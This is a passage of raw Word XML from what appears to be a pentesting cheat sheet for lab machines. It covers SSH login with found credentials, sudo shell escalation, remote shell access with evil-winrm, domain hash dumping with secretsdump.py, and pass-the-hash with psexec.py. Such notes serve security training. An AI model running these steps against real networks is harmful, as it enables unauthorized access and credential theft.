        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="047871E1" w14:textId="77777777" w:rsidR="00DE1041" w:rsidRDefault="00DE1041"/>
    <w:p w14:paraId="55AAA563" w14:textId="3EF62865" w:rsidR="00472B43" w:rsidRDefault="00472B43">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA78901" w14:textId="72C0C196" w:rsidR="00472B43" w:rsidRDefault="00AC7068" w:rsidP="007740C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploit Secure Shell</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1081"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="007740C0" w14:paraId="5C254F49" w14:textId="77777777" w:rsidTr="007740C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AC68401" w14:textId="77777777" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CC304D6" w14:textId="77777777" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="410F614D" w14:textId="13CA2235" w:rsidR="007740C0" w:rsidRPr="00322D20" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF ACCESS CAN BE MADE USING SECURE SHELL (PORT 22). OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F05AD45" w14:textId="56E46A2D" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:r>
              <w:t>If port 22 (ssh) is open, use any found login details to connect to the host using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">USERNAME@IP ADDRESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2BE4">
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
              <w:t>-p 22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D515BE" w14:textId="45E0A9F1" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:r>
              <w:t>Useful commands once in as a user:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B00685" w14:textId="77777777" w:rsidR="007740C0" w:rsidRPr="003C17BE" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FF6F6C2" w14:textId="77777777" w:rsidR="007740C0" w:rsidRPr="003C17BE" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">        id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30652D2B" w14:textId="77777777" w:rsidR="007740C0" w:rsidRPr="003C17BE" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">        sudo -l</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3482A968" w14:textId="77777777" w:rsidR="007740C0" w:rsidRPr="003C17BE" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">        sudo bin/shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7404184E" w14:textId="6B375C66" w:rsidR="007740C0" w:rsidRPr="00C933E4" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C17BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">        sudo bin/bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007740C0" w14:paraId="7B0B4A6A" w14:textId="77777777" w:rsidTr="007740C0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E5F938A" w14:textId="77777777" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53ABDDD0" w14:textId="77777777" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="036955C0" w14:textId="77777777" w:rsidR="007740C0" w:rsidRDefault="007740C0" w:rsidP="007740C0"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="351B4634" w14:textId="77777777" w:rsidR="007740C0" w:rsidRDefault="007740C0"/>
    <w:p w14:paraId="72209AE5" w14:textId="77777777" w:rsidR="00156E85" w:rsidRDefault="00156E85">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F86127" w14:textId="32DFDE48" w:rsidR="00156E85" w:rsidRDefault="00156E85" w:rsidP="00156E85">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using evil-winrm To Exploit </w:t>
      </w:r>
      <w:r w:rsidR="006660E3">
        <w:t xml:space="preserve">and Gain Access To </w:t>
      </w:r>
      <w:r>
        <w:t>Windows Domains</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1081"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="000233AF" w14:paraId="0DFB8DDD" w14:textId="77777777" w:rsidTr="000743C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="265B8422" w14:textId="77777777" w:rsidR="000233AF" w:rsidRDefault="000233AF" w:rsidP="000743C5">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1FE8D662" w14:textId="17699F58" w:rsidR="000233AF" w:rsidRDefault="000233AF" w:rsidP="000743C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>evil-winrm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6049E5A3" w14:textId="0BEACC87" w:rsidR="000233AF" w:rsidRDefault="000233AF" w:rsidP="00156E85">
            <w:r>
              <w:t>First of all, ensure evil-winrm is installed:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00156E85">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00156E85">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> gem </w:t>
            </w:r>
            <w:r w:rsidRPr="00156E85">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00156E85">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>evil-winrm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000233AF" w14:paraId="2E402E0E" w14:textId="77777777" w:rsidTr="000233AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6BCAB10E" w14:textId="5EE98E32" w:rsidR="000233AF" w:rsidRDefault="000233AF" w:rsidP="000743C5">
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="59F74E29" w14:textId="77777777" w:rsidR="000233AF" w:rsidRDefault="000233AF" w:rsidP="000743C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F7E6045" w14:textId="1CD051D2" w:rsidR="000233AF" w:rsidRDefault="000233AF" w:rsidP="000743C5">
            <w:r>
              <w:t>Next, use the following command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> evil-winrm </w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-i </w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.30 </w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r w:rsidRPr="000233AF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
            <w:r w:rsidR="00B43D2C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00B43D2C">
              <w:t>If successful, this should allow us to gain access via a remote shell to the machine via the IP address and logging in as the user specified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009417D3" w14:paraId="59168C62" w14:textId="77777777" w:rsidTr="00797DE3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03BCD7AB" w14:textId="635064BC" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7EAA8034" w14:textId="628549B3" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>secretsdump.py</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Must have Impacket unpacked and installed; check 1.e for more about getting impacket installed and ready)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6E0536DC" w14:textId="296299E8" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:r>
              <w:t>secretsdump.py can be found within impacket (see above, 1.f, for more) and used as a way to grab hashes of user passwords used within the domain (ALL ONE COMMAND).</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> secretsdump.py</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-dc-ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.30</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
              </w:rPr>
              <w:t>space here</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DOMAIN.NAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASSWORD</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="00B43D2C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009417D3" w14:paraId="07355C89" w14:textId="77777777" w:rsidTr="00797DE3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0BF5D1AE" w14:textId="76D89E3A" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7079B4BC" w14:textId="77777777" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="081776CD" w14:textId="765AA570" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:r>
              <w:t>If this works, you should be granted with the hashed passwords of the users in the domain. With these we can use impacket’s psexec.py script to gain admin privileges…</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009417D3" w14:paraId="7ED0C044" w14:textId="77777777" w:rsidTr="000233AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5F471698" w14:textId="5209AFE4" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="453AAFC4" w14:textId="2916E101" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>psexec.py</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Must have Impacket unpacked and installed; check 1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidRPr="001F411D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> for more about getting impacket installed and ready)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7775D747" w14:textId="17C1EA86" w:rsidR="009417D3" w:rsidRDefault="009417D3" w:rsidP="000743C5">
            <w:r>
              <w:t>psexec.py can be found within impacket (see above, 1.f, for more) and used as a way to Pass The Hash attack and gain elevated access. Use:</w:t>
            </w:r>
            <w:r w:rsidR="006660E3">
              <w:t xml:space="preserve"> (ALL ONE COMMAND).</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009417D3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">psexec.py </w:t>
            </w:r>
            <w:r w:rsidRPr="009417D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>DOMIAN.NAME</w:t>
            </w:r>
            <w:r w:rsidRPr="009417D3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USERNAME</w:t>
            </w:r>
            <w:r w:rsidRPr="009417D3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r w:rsidRPr="009417D3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.10.30 </w:t>
            </w:r>
            <w:r w:rsidRPr="009417D3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-hashes </w:t>
            </w:r>
            <w:r w:rsidR="006660E3">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006660E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HASHSTRING</w:t>
            </w:r>
            <w:r w:rsidRPr="006660E3">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="006660E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HASHSTRING</w:t>
            </w:r>
            <w:r w:rsidR="006660E3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="006660E3" w:rsidRPr="006660E3">
              <w:t>Two hashes will be needed, but secretsdump.py, if successful, will provide the two hashes separated with a colon.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00156E85" w14:paraId="1983C482" w14:textId="77777777" w:rsidTr="000233AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="067DFD21" w14:textId="79F1178F" w:rsidR="00156E85" w:rsidRDefault="00156E85" w:rsidP="000743C5"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
